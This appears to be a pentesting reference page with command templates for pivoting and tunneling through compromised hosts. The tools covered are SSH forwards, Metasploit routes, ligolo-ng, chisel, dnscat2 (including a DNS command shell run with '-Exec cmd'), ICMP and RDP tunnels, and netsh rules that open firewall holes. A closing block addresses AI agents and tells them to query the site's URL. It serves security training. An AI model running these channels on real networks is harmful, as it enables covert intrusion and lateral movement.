# Pivoting & Tunneling ## SSH `client`: Where the ssh command is executed. \ `server`: Target of the ssh connection. In Windows see `%systemdrive%\Windows\System32\OpenSSH` (`where ssh`) {% tabs %} {% tab title="Local" %} Allows a local client port to be mapped to another port on a certain target reachable by the server. {% code overflow="wrap" %} ```bash ssh -N -L [:]:: @ ``` {% endcode %} *(possible to repeat multiple times -L for multiple ports)* {% endtab %} {% tab title="Dynamic" %} Allows a local client port to be mapped to the server. That port will be used as a proxy socks, so packets passing through that port will leave from the server. {% code overflow="wrap" %} ```bash ssh -N -D [:] @ ``` {% endcode %} {% code overflow="wrap" %} ```bash vim /etc/proxychains[4].conf # socks4 127.0.0.1 ``` {% endcode %} {% code overflow="wrap" %} ```bash sudo proxychains[4] ``` {% endcode %} *(ex.. nmap, msfconsole)* {% endtab %} {% tab title="Remote" %} Allows a port on the server to be mapped to another port on a target reachable by the client. {% code overflow="wrap" %} ```bash ssh -N -R [:]:: @ ``` {% endcode %} {% endtab %} {% tab title="Dynamic Remote" %} Allows a server port to be mapped to the client. That port will be used as a proxy socks, so packets passing through that port will leave from the client. {% code overflow="wrap" %} ```bash ssh -N -R [:] @ ``` {% endcode %} {% endtab %} {% tab title="Note" %} `-N`: Without the ability to execute remote commands.\ `0.0.0.0`: All interface. If you are using the “Remote” technique and need to connect to your machine: * `sudo systemctl start ssh` * Setting `PasswordAuthentication` to `yes` in `/etc/ssh/sshd_config` * Use very secure passwords for accounts {% endtab %} {% endtabs %} ## Metasploit {% tabs %} {% tab title="Route" %} Pivoting only inside metasploit.\ Maps reaching other subnets via meterpreter sessions (via victim hosts). {% code overflow="wrap" %} ```bash post/multi/manage/autoroute # set network and session ``` {% endcode %} Or {% code overflow="wrap" %} ```bash route add ``` {% endcode %} Or, in Meterpreter: {% code overflow="wrap" %} ```bash run autoroute -s ``` {% endcode %} {% endtab %} {% tab title="Socks Proxy" %} Pivoting for tools outside metasploit.\ Allows a local port to be mapped to metasploit. That port will be used as a proxy socks, so packets passing through that port will be handled by the route paths defined in metasploit. {% code overflow="wrap" %} ```bash # Set Route ``` {% endcode %} {% code overflow="wrap" %} ```bash auxiliary/server/socks_proxy # set vSocks 4a or 5 and PORT ``` {% endcode %} {% code overflow="wrap" %} ```bash vim etc/proxychains[4].conf # socks4 127.0.0.1 ``` {% endcode %} {% code overflow="wrap" %} ```bash sudo proxychains[4] ``` {% endcode %} *(ex. nmap)* {% endtab %} {% tab title="Port Forwarding" %} In meterpreter you can define both a Local and a Remote port forwarding (see above ssh). Local {% code overflow="wrap" %} ```bash portfwd add -l -p -r ``` {% endcode %} Remote {% code overflow="wrap" %} ```bash portfwd add -R -l -p -L ``` {% endcode %} {% endtab %} {% endtabs %} ## Other ### Simple Port Forwarding (single-host) {% tabs %} {% tab title="Linux" %} Define the listening port and the destination to rebroadcast to. {% code overflow="wrap" %} ```bash socat TCP4-LISTEN:,fork TCP4:: ``` {% endcode %} {% endtab %} {% tab title="Windows" %} Define the listening port and the destination to rebroadcast to.\ Requires administrator privileges. {% code overflow="wrap" %} ```powershell netsh.exe interface portproxy add v4tov4 listenport= listenaddress=0.0.0.0 connectport= connectaddress= ``` {% endcode %} {% code overflow="wrap" %} ```powershell netsh.exe interface portproxy del v4tov4 listenport= listenaddress=0.0.0.0 ``` {% endcode %} To view {% code overflow="wrap" %} ```powershell netsh.exe interface portproxy show [v4tov4 or all] ``` {% endcode %} ***N.B.** create a hole in the firewall if there is one* {% code overflow="wrap" %} ```powershell netsh.exe advfirewall firewall add rule name="" protocol=TCP dir=in localip= localport= action=allow ``` {% endcode %} {% code overflow="wrap" %} ```powershell netsh.exe advfirewall firewall delete rule name="" ``` {% endcode %} {% endtab %} {% endtabs %} ### [sshutle](https://github.com/sshuttle/sshuttle) It allows you to define on the local machine routes to certain subnets reachable from a host, via an ssh tunnel to that host. It therefore eliminates the need to configure proxychains. {% code overflow="wrap" %} ```bash sudo sshuttle -r @: ``` {% endcode %} {% code overflow="wrap" %} ```bash ``` {% endcode %} *NO proxychains, but root on the SSH client and Python3 on the SSH server.* ### [Plink](https://www.chiark.greenend.org.uk/~sgtatham/putty/latest.html) On Windows before OpenSSH, [PuTTY](https://www.putty.org/) and its command-line-only counterpart [Plink](https://www.chiark.greenend.org.uk/~sgtatham/putty/latest.html) were used.\ Plink has much of the functionality offered by ssh. {% tabs %} {% tab title="Remote" %} {% code overflow="wrap" %} ```powershell plink.exe -ssh -R :: @ ``` {% endcode %} {% endtab %} {% tab title="Dynamic" %} {% code overflow="wrap" %} ```powershell plink.exe -ssh -D 9050 @ ``` {% endcode %} Download [Proxifier](https://www.proxifier.com/), portable version *(like proxychains but for windows).* Set new proxy server `socks5` to `127.0.0.1:9050` {% code overflow="wrap" %} ```powershell ``` {% endcode %} {% endtab %} {% tab title="Note" %} If we cannot interact with the running shell: {% code overflow="wrap" %} ```powershell -pw # specify password from command ``` {% endcode %} {% code overflow="wrap" %} ```powershell cmd.exe /c echo y | plink.exe -ssh ... # via piping ``` {% endcode %} {% endtab %} {% endtabs %} ## Tunneling ### [ligolo-ng](https://github.com/Nicocha30/ligolo-ng) {% code overflow="wrap" %} ```bash apt install ligolo-ng ``` {% endcode %} **Proxy** on Attacker machine.\ **Agent** on Victim machine. {% tabs %} {% tab title="Attacker" %} {% code overflow="wrap" %} ```bash sudo ./proxy -selfcert # See ATTACKER_IP ATTACKER_PORT # > help ``` {% endcode %} Connect the victim to the server {% code overflow="wrap" %} ```bash > sessions > autoroute ``` {% endcode %}
Ligolo-ng < v0.6 {% code overflow="wrap" %} ```bash sudo ./proxy -selfcert [-laddr :] # See ATTACKER_IP ATTACKER_PORT # > help ``` {% endcode %} Create a tun interface on the Proxy Server (C2) {% code overflow="wrap" %} ```bash sudo ip tuntap add user mode tun ligolo sudo ip link set ligolo up ``` {% endcode %} Connect the victim to the server and select the session {% code overflow="wrap" %} ```bash > sessions > > ifconfig ``` {% endcode %} Setup routing {% code overflow="wrap" %} ```bash sudo ip route add dev ligolo ``` {% endcode %} {% code overflow="wrap" %} ```bash > start [--tun ] > stop ``` {% endcode %}
Ligolo-ng >= v0.6 {% code overflow="wrap" %} ```bash sudo ./proxy -selfcert # See ATTACKER_IP ATTACKER_PORT # > help ``` {% endcode %} Create a tun interface on the Proxy Server (C2) {% code overflow="wrap" %} ```bash > interface_create --name "" ``` {% endcode %} Connect the victim to the server and select the session {% code overflow="wrap" %} ```bash > session > > ifconfig ``` {% endcode %} Start the tunneling {% code overflow="wrap" %} ```bash > tunnel_start --tun ``` {% endcode %} Setup routing {% code overflow="wrap" %} ```bash > interface_add_route --name --route ``` {% endcode %}
{% endtab %} {% tab title="Victim" %} Connect to the attacker server {% code overflow="wrap" %} ```bash ./agent.exe -connect : -ignore-cert ``` {% endcode %} {% endtab %} {% tab title="Listener" %} `PROXY --> AGENT1 --> AGENT2 --> ?` You can listen to ports on the *agent* and *redirect* connections to your control/proxy server. {% code overflow="wrap" %} ```bash listener_add --addr : --to : --tcp ``` {% endcode %} {% code overflow="wrap" %} ```bash > listener_add --addr 0.0.0.0:1234 --to 127.0.0.1:4321 --tcp ``` {% endcode %} Useful when we need to set up a reverse shell or something else from the second target (`AGENT2`) in the network that is not directly reachable. If we want to do another pivoting from the second target machine (`AGENT2`), we just need to load the agent, reconnect to the proxy server via the set listener, set new tun *(ex. ligolo2)* and add routing (see [here](https://www.youtube.com/watch?v=LiaBVuz2B4o\&ab_channel=redfire359)). {% endtab %} {% tab title="Note !" %} Because the *agent* is running without privileges, it's not possible to forward raw packets. When you perform a NMAP SYN-SCAN, a TCP connect() is performed on the agent.\ When using *nmap*, you should use `--unprivileged` or `-PE` to avoid false positives. {% endtab %} {% endtabs %} ### [chisel](https://github.com/jpillora/chisel) It performs TCP/UDP pivoting and tunneling, transported over **HTTP** and encrypted internally via SSH.\ Being hidden under HTTP it can bypass some restrictions. On **Attacker** {% code overflow="wrap" %} ```bash chisel server -p --reverse --socks5 ``` {% endcode %} On **Target** {% code overflow="wrap" %} ```bash chisel client [] ``` {% endcode %} ``: {% tabs %} {% tab title="C -> S" %} ``` ::: ``` {% endtab %} {% tab title="S -> C" %} ``` R:::: ``` {% endtab %} {% tab title="Port Forwarding" %} ``` [R:]: ``` {% endtab %} {% tab title="Dynamic" %} ``` [R:]:socks ``` Add the port in proxychains {% code overflow="wrap" %} ```bash vim /etc/proxychains[4].conf socks5 127.0.0.1 ``` {% endcode %} {% code overflow="wrap" %} ```bash proxychains[4] ``` {% endcode %} {% endtab %} {% endtabs %} ### [dnscat2](https://github.com/iagox86/dnscat2) **DNS**-based encrypted command-and-control channel.\ A dnscat2 server runs on an authoritative name server for a particular domain (or as in our case a dummy dns server is created) while the client, configured to run queries on that domain, runs on the compromised machine. On **Attacker** (Server) {% code overflow="wrap" %} ```bash sudo apt install dnscat2 ``` {% endcode %} {% code overflow="wrap" %} ```bash sudo dnscat2-server --dns host=,port=53,domain= # Memorize secret ``` {% endcode %} On **Target** (Client) Download compiled from [HERE](https://downloads.skullsecurity.org/dnscat2/) {% code overflow="wrap" %} ```bash ./dnscat --dns server=,port=53,domain= --secret= ``` {% endcode %} Or with [Windows PowerShell Script](https://github.com/lukebaggett/dnscat2-powershell) {% code overflow="wrap" %} ```powershell Import-Module .\dnscat2.ps1 Start-Dnscat2 -DNSserver -Domain -PreSharedSecret -Exec cmd ``` {% endcode %} Once connected, from **Attacker** ```bash ? --help windows   # see connections ID window -i # shell ``` ### [ptunnel-ng](https://github.com/utoni/ptunnel-ng) Communication channel encapsulated in **ICMP** packets.\ Requires administrator privileges. Installation * `.exe` for Windows [HERE](https://github.com/utoni/ptunnel-ng/releases) {% code overflow="wrap" %} ```bash git clone https://github.com/utoni/ptunnel-ng.git && cd ptunnel-ng sudo ./autogen.sh cd src ``` {% endcode %} On **Target** (Server) {% code overflow="wrap" %} ```bash sudo ./ptunnel-ng -r -R22 ``` {% endcode %} On **Attacker** (Client) {% code overflow="wrap" %} ```bash sudo ./ptunnel-ng -p -l2222 -r -R22 ``` {% endcode %} {% tabs %} {% tab title="Local" %} {% code overflow="wrap" %} ```bash ssh -p2222 -l ``` {% endcode %} {% endtab %} {% tab title="Dynamic" %} {% code overflow="wrap" %} ```bash ssh -D 9050 -p2222 -l 127.0.0.1 ``` {% endcode %} {% code overflow="wrap" %} ```bash vim /etc/proxychains[4].conf # socks4 127.0.0.1 9050 ``` {% endcode %} {% code overflow="wrap" %} ```bash sudo proxychains[4] sudo proxychains[4] nmap ``` {% endcode %} {% endtab %} {% endtabs %} ### [SocksOverRDP](https://github.com/nccgroup/SocksOverRDP) Allows tunnelling and pivoting between Windows systems via **RDP**.\ Requires administrator privileges. On **Attacker** (Client), with System PowerShell {% code overflow="wrap" %} ```powershell regsvr32.exe SocksOverRDP-Plugin.dll ``` {% endcode %} {% code overflow="wrap" %} ```powershell mstsc.exe # Connect on target1 ``` {% endcode %} Download [Proxifier](https://www.proxifier.com/), portable version *(like proxychains but for windows).* Set new proxy server `socks5` to `127.0.0.1:1080` On **Target1**, with System PowerShell {% code overflow="wrap" %} ```powershell SocksOverRDP-Server.exe ``` {% endcode %} On **Attacker** {% code overflow="wrap" %} ```powershell mstsc.exe # Connect on target1 via Target1 pivoting ``` {% endcode %} ## Warning * With proxychains only full TCP connect scan (`nmap -sT`) * Windows Defender blocks ICMP, traditional ping (`nmap -Pn`) --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://ivalexev.gitbook.io/rednote/pentesting-process/pivoting-and-tunneling.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.